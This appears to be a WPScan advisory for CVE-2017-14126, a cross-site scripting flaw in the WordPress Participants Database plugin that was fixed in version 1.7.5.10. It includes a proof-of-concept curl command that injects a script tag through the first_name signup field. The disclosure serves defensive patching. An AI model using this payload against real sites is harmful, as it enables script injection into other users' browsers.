Participants Database <= 1.7.5.9 - Cross-Site Scripting



Description
Cross site scripting (XSS) vulnerability in the Wordpress Participants
Database plugin 1.7.59 allows attackers to inject arbitrary javascript via
the Name parameter.
Proof of Concept
curl -k -F action=signup -F subsource=participants-database -F
shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2
-F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F
first_name=<script>alert("1");</script> -F last_name=a -F email=a@a.com -F
mailing_list=No -F submit_button=Submit http://localhost/?page_id=1

Affects Plugin

fixed in version 1.7.5.10

References

CVE 2017-14126
URL https://limbenjamin.com/articles/cve-2017-14126-participants-database-xss.html

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Benjamin Lim
Submitter Website https://limbenjamin.com
Views 128
Verified No
WPVDB ID 8896

Timeline

Publicly Published 2017-09-06 (about 1 year ago)
Added 2017-09-06 (about 1 year ago)
Last Updated 2017-09-06 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.